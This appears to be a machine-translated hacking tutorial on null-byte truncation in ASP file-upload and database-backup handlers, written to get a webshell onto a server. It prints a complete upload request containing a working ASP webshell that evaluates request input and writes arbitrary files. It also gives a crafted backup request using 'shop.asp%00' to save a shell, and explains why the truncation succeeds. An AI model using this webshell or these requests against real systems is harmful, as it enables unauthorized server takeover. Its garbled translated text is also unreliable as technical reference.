Upload Vulnerability filepath variable \ 00 Truncation

 

POST/coin/upload. asp? Action = upfile HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword ,*/*

Referer:

Recently, phpwind has a vulnerability. This vulnerability has always been exploited to use local inclusion to obtain shell. If the magic quotes are off, % 00 can be truncated, so we can construct the variables we need at will. However, the topic we are discussing today is not this, but a classic upload \ 00 truncation of filepath and controlling the file suffix.

 

The following is an uploaded package:

 

 

Upload/2010/2/201002232155064073.gif

----------------------------- 7d9138191ce08bc

Content-Disposition: form-data; name = "valcode"

 

 

 

6918

----------------------------- 7d9138191ce08bc

Content-Disposition: form-data; name = "file_name1"; filename = "D: \ hacker \ xiaoma.gif"

Content-Type: text/plain

<% Eval request ("#") %>

<% On error resume next %>

<% Ofso = "scripting. filesystemobject" %>

<% Set fso = server. createobject (ofso) %>

<% Path = request ("path") %>

<% If path <> "" then %>

<% Data = request ("dama") %>

<% Set dama = fso. createtextfile (path, true) %>

<% Dama. write data %>

<% If err = 0 then %>

<% = "Success" %>

<% Else %>

<% = "False" %>

<% End if %>

<% Err. clear %>

<% End if %>

<% Dama. close %>

<% Set dama = nothing %>

<% Set fos = nothing %>

<% = "<Form action ='' method = post> "%>

<% = "<Input type = text name = path>" %>

<% = "<Br>" %>

<% = Server. mappath (request. servervariables ("script_name") %>

<% = "<Br>" %>

<% = "" %>

<% = "<Textarea name = dama cols = 70 rows = 30 width = 30> </textarea>" %>

<% = "<Br>" %>

<% = "<Input type = submit value = save>" %>

<% = "</Form>" %>

----------------------------- 7d9138191ce08bc

Content-Disposition: form-data; name = "submit"

Upload

----------------------------- 7d9138191ce08bc --

If nothing happens, we can upload our webshell.

 

In practice, we often encounter a type of background with backup, but it adds a. mdb to the end of the backup file, such as the following code.

Sub backupdata ()

Dbpath = request. form ("Dbpath ")

Dbpath = server. mappath (Dbpath)

Bkfolder = request. form ("bkfolder ")

Bkdbname = request. form ("bkdbname ")

Set Fso = server. createobject ("scripting. filesystemobject ")

If fso. fileexists (dbpath) then

If CheckDir (bkfolder) = True Then

Response. write bkfolder & "\" & bkdbname & ". mdb" 'I printed it out for him

Fso. copyfile dbpath, bkfolder & "\" & bkdbname & ". mdb"

Else

MakeNewsDir bkfolder

Fso. copyfile dbpath, bkfolder & "\" & bkdbname & ". mdb"

End if

Response. write "the database backup is complete. Please perform other operations! Back up the database using FTP to ensure data security"

Else

Response. write "the file you want to back up cannot be found! "

End if

End sub

Function CheckDir (FolderPath)

Folderpath = Server. MapPath (".") & "\" & folderpath

Set fso1 = CreateObject ("Scripting. FileSystemObject ")

If fso1.FolderExists (FolderPath) then

CheckDir = True

Else

CheckDir = False

End if

Set fso1 = nothing

End Function

Function MakeNewsDir (foldername)

Set fso1 = CreateObject ("Scripting. FileSystemObject ")

Set f = fso1.CreateFolder (foldername)

MakeNewsDir = True

Set fso1 = nothing

End Function

The general idea is to back up to 1.asp; asp. mdb to use webshell.

But if we're sorry, what about the iis7 or apache server?

When you think you are smart, you also want to cut it off.

The modified packages are as follows:

POST/bjxshop/admin/Backup. asp? Action = Backup HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword ,*/*

Referer: http: // localhost/bjxshop/admin/backup. asp

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: localhost

Content-Length: 79

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDCSASTTAR = egg?hbcahnkpgpoeookifb

DBpath = .. % 2 Fdata % 2F % 23bjxshop. mdb & bkfolder = .. % 2 FDatabackup & bkDBname = shop. asp % 00

Because of url encoding conversion .. \ 00 to % 00

After the nc is submitted, it seems a little different from what you think ?? Shop. asp. mdb

Not truncated!

The above is the test on the local iis5.0.

After thinking for a long time, I finally got a clue.

I found some information online and tested it locally.

<%

If request. queryString <> "then

Id = request. queryString ("id ")

Response. write "Get :"

Response. write id & ". mdb"

End if

%>

Save as re. asp

Submit re. asp? Id = 111% 00111

Get reserved characters before % 00

This is a problem with the request. The request ("parameter") is automatically interrupted at % 00, and the characters % 00 and later are discarded.

 

So why can the above filepath variable be truncated?

Compare the differences between the two packages

Forms for uploading files

Enctype = "multipart/form-data" is in this format

While normal forms

The format is not defined,

Default Value: Content-Type: application/x-www-form-urlencoded

For details about the differences, refer to the principle of the no-component upload class (I have not written it myself, it is too troublesome, but I can understand it)

Enctype = "multipart/form-data" this format uploads a file form. Our component-less upload class must split its content (with a fixed format) to get the file name, file Content, PATH value, because the PATH value is obtained by segmentation

Therefore, the evil symbol \ 00 is retained and saved.

 

Ps: when testing the pw local inclusion vulnerability, it may be the cause of the php mechanism. % 00 in the get parameter is also included.

 

The above is a small personal achievement, which may not help you with shell, but it is a little proud to be a little bit of something you have tested.